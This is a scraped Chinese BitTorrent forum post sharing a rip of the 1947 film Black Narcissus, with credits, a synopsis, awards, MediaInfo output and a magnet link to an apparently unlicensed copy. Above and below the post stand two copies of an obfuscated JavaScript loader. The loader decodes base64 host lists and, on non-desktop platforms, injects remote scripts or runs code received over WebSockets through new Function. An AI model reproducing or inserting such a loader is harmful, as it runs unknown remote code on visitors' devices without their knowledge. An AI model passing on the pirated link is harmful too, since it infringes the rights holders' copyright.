黑水仙[中文字幕].Black.Narcissus.1947.1080p.BluRay.DTS.x265-10bit 8.25GB

版主小s 1月前 178

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑水仙 / 思凡(港) / 空门遗恨(台) / 雪岭春梦

◎片 名 Black Narcissus

◎年 代 1947

◎产 地 英国

◎类 别 剧情

◎语 言 英语

◎上映日期 1947-05-26(英国)

◎IMDb链接 https://www.imdb.com/title/tt0039192/

◎豆瓣评分 7.7/10 (2648人评价)

◎豆瓣链接 https://movie.douban.com/subject/1292733/

◎片 长 100 分钟

◎导 演 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎编 剧 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎演 员 黛博拉·蔻儿 Deborah Kerr (id:1027301)

弗劳拉·罗博森 Flora Robson (id:1000546)

简·西蒙斯 Jean Simmons (id:1007033)

大卫·法拉尔 David Farrar (id:1023227)

萨布 Sabu (id:1004991)

凯思琳·拜荣 Kathleen Byron (id:1014300)

Jenny Laird Jenny Laird (id:1108624)

杰克·卡迪夫 Jack Cardiff (id:1050278)

雷金纳德·米尔斯 Reginald Mills (id:1292130)

◎标 签 英国 / 英国电影 / 1947 / 宗教 / 1940s / 迈克尔·鲍威尔 / MichaelPowell / CC

◎简 介

剧情讲述印度加尔各答修道院的克罗塔修女奉调到纳普修道院当院长,纳普修道院在印度北方海拔8000尺高山上,常年刮着强风。克罗塔建立学校和医院,连小将军都来受教育。克罗塔虽从百废待兴中辛勤工作,治理得有条有理,但年轻的修女们在偏远高山上全凭自律修持,唯美的环境使精神受到挑战,在不断的诱惑下,无法把持者只有放弃圣职。在此中有如智者所言,只有圣者和俗人可能生存——因为生活在大自然中只有修身养性或是随波逐流。

后来,发生了幼儿病死及露丝修女因爱恨还俗并欲杀害院长反坠入深谷等事件,克罗塔也因此离开纳普修道院以弥平心中的伤痕。

相关评价

迈克尔.鲍威尔导演,本片表现出人性在环境的影响下可以改变的不争事实,在人性脆弱的时候,就不能抗拒环境带给它的压力,和抵抗外来环境的影响的自制。影片在表现角色内心挣扎的细微活动细致,演员在诠释各种角色的角度...

◎获奖情况 (共3项)

第20届奥斯卡金像奖 (1948)

彩色片最佳摄影

└──杰克·卡迪夫 (id:1050278)

彩色片最佳艺术指导和布景

└──阿尔弗雷德·荣格 (id:1008715)

第5届金球奖 (1948)

电影类 最佳摄影

└──杰克·卡迪夫 (id:1050278)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 324184135731264741637848646336955653406 (0xF3E397EC57116F7228AB530E07219D1E)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.25 GiB

  8. Duration : 1 h 40 min

  9. Overall bit rate : 11.7 Mb/s

  10. Movie name : Black Narcissus 1947 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-28 05:24:35

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 40 min

  21. Bit rate : 10.9 Mb/s

  22. Width : 1 476 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 4:3

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.286

  31. Stream size : 7.68 GiB (93%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 40 min

  42. Bit rate mode : Constant

  43. Bit rate : 768 kb/s

  44. Channel(s) : 1 channel

  45. Channel layout : C

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 553 MiB (7%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 38 min

  62. Bit rate : 30.8 kb/s

  63. Count of elements : 1947

  64. Stream size : 21.7 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 38 min

  76. Bit rate : 31.6 kb/s

  77. Count of elements : 1947

  78. Stream size : 22.3 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:02:07.708 : en:Chapter 02

  86. 00:07:38.708 : en:Chapter 03

  87. 00:11:06.958 : en:Chapter 04

  88. 00:13:55.958 : en:Chapter 05

  89. 00:18:45.500 : en:Chapter 06

  90. 00:21:29.167 : en:Chapter 07

  91. 00:24:23.958 : en:Chapter 08

  92. 00:29:51.000 : en:Chapter 09

  93. 00:34:35.375 : en:Chapter 10

  94. 00:40:33.833 : en:Chapter 11

  95. 00:51:24.917 : en:Chapter 12

  96. 00:56:35.458 : en:Chapter 13

  97. 01:00:04.583 : en:Chapter 14

  98. 01:06:52.125 : en:Chapter 15

  99. 01:12:29.625 : en:Chapter 16

  100. 01:18:48.625 : en:Chapter 17

  101. 01:25:10.750 : en:Chapter 18

  102. 01:29:33.458 : en:Chapter 19

  103. 01:35:11.000 : en:Chapter 20




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:395E579E9ABB6B856F6E8B506BD5065B8DB3972C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};